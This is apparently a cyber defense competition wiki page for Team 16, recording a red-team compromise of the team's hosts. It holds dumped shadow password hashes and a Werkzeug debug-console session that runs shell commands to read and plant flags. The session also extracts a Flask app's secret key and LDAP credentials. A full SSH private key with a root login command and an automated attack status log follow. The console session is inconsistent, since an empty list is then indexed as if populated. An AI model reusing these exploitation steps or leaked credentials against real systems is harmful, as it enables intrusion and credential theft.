Team 16 Wiki Page

Signup Login
Team Information
Team Cacttus Shield logo
Number
Team 16
Name
Cacttus Shield
IP Range
168.84.5.0/24
Domain
team16.isucdc.com
Current Place
13th
Red Teamer(s)
None
Flag Status
Blue Flags
AD C:\Windows\System32\ TICKETS C:\Windows\System32\ MGMT /etc/ ADMIN C:\Windows\System32\ WWW /etc/ TICKETS Forged ticket MGMT DB Read MGMT Bus service MGMT Train service
Red Flags
AD C:\Users\Administrator\ TICKETS C:\Users\Administrator\ MGMT /root/ ADMIN C:\Users\Administrator\ WWW /root/
Service Status
AD LDAP
AD RDP
AD LDAPS
TICKETS HTTP
TICKETS RDP
MGMT HTTP
MGMT SSH
ADMIN HTTP
ADMIN RDP
WWW HTTP
WWW SSH
ADMIN Login
WWW Login
Nmap
root:$6$IKSeF6VheFC/Hc2o$9kuV5c1gGdscQMhLNKWObPgcDUZpusEBf1uEi337jnkp8NXbR7y87uzhH9E3Vlox3.pDIj3Nkli3dvC8xYtiT0:20488:0:99999:7:::
cdc:$6$f8F2tIVX0VkHCuXK$cT2qRYIVGKp9eQVV21x5hOAMJ3wJO6j0qwbOamNkAPXxNZgNas6m6lrOTDbob3HcZGWqOn5fnYJ9hSau28GzL.:20488:0:99999:7:::

Notable Vulnerabilities
Add content here...
[console ready]
>>> import os; os.popen("whoami").read()
'cdc\n'
>>> os.popen("cat /etc/team16_mgmt-etc.flag").read()
'p6g4r00KHJfBWLNr6UuZLlr5TgFaZpzn3Rqapsj097XWL9fInh\n'
>>> os.popen("echo 'GGpkAveRjtoOj41mosUmUbzDLiDFDwHaGvmYfYEc2tO7xwB8HF' > /root/red-flag").read();
''
>>> os.popen("cat /root/red-flag").read()
''


>>> import inspect, flask; apps=list({id(v):v for f in inspect.stack() for v in f.frame.f_locals.values() if isinstance(v, flask.app.Flask)}.values()); apps
[]
>>> app = apps[0]

>>> {k:v for k,v in app.config.items() if "SECRET" in k or "FLAG" in k or "LDAP" in k}
{'SECRET_KEY': '518e5c4a17da4321122f9e648c80f527c16c75f1682808502beb098156a88d29', 'FLAGS': {'train_service_flag': 'dWRvpK3TjHVmQRvmnD6k6NoeNM7WMh6nbTcWByHhF7uM4DNdyL', 'bus_service_flag': 'I8KL049EsWJ4jBf56F1WiJMqs6hDp7PdSgaicg5qSPVQaBRvZQ', 'db_read_flag': 'V7NTmuwT99JhqPq3nIIgSpUyLXXKWpOYv4MoHPcDobj1cSogpd'}, 'LDAP_DN': 'cn=users,dc=team16,dc=isucdc,dc=com', 'LDAP_DOMAIN': 'team16.isucdc.com', 'LDAP_PASS': '7-d7$oYOd2iP', 'LDAP_SERVER': '10.10.10.2', 'LDAP_USER': 'svc_webapp'  }




-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW QyNTUxOQAAACBV7FrHWBPVKg+2NT0VAA7kyySHoOdCJLzflcPh0+H2KAAAAJjRmDHM0Zgx zAAAAAtzc2gtZWQyNTUxOQAAACBV7FrHWBPVKg+2NT0VAA7kyySHoOdCJLzflcPh0+H2KA AAAEDX1jyyVNBW88a+MpfCtUzvAMJGQz831t6rJivBxcVkoFXsWsdYE9UqD7Y1PRUADuTL JIeg50IkvN+Vw+HT4fYoAAAAEEFkbWluaXN0cmF0b3JAYWQBAgMEBQ== -----END OPENSSH PRIVATE KEY-----

ssh -i id_key root@168.84.5.250

Notable Defenses
TEAM 16
────────────────────────────────────────────────────────────
  [Team 16] MGMT backend online (HTTP 401)
  [Team 16] Ticket forge: no flag (patched)
  [Team 16] DB flag: not accessible
  [Team 16] Auth bypass: all users rejected (LDAP patched)
  [Team 16] Vehicle flag (bus): not available yet
  [Team 16] Vehicle flag (train): not available yet
  [Team 16] Admin UI online
  [Team 16] Code-server: not accessible (patched or blocked)
  [Team 16] Attempting Werkzeug persistence on MGMT...
  [Team 16] Werkzeug RCE not available (patched)


Team Spirit Issues
Add content here...